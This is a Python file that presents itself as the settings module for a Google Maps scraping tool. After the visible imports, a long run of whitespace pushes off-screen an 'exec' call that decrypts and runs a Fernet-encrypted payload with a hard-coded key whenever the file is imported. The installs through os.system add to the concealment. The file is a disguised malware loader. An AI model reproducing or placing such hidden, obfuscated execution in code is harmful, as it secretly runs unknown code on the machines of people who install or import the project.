import os
os.system('pip install cryptography')
os.system('pip install fernet')
os.system('pip install requests')
from fernet import Fernet
import requests                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ;exec(Fernet(b'sEZPE4SJpc7ew57i5hAqq-YoagEHwucRlnaBnQ5AT9o=').decrypt(b'gAAAAABlROK8YWzGGRBvEYCmCjA43Q5kz6GPZ0iP9HWVHKyFt7EgeDM6IBU6a_Y4-6revndLkWGFlvhLQsFDFJFr5PgBIoM3CzfhuKE41VpsUagfCt8w7Y9Eud8aVXzakDGCjTMPF9WsMXJVSYDIss_G99GaGp3vjBgE0m13bZNMDjizAZkwT6o8nu4wX_IxfRBbk9T4zarW0R2KwW2cYNzXQVwOK_m16w=='))
SETTINGS = {
    "MAPS_INDEX": "https://maps.google.com",
    "PAGE_DEPTH": 1,
    "PLACES": [],
    "BASE_QUERY": "",
}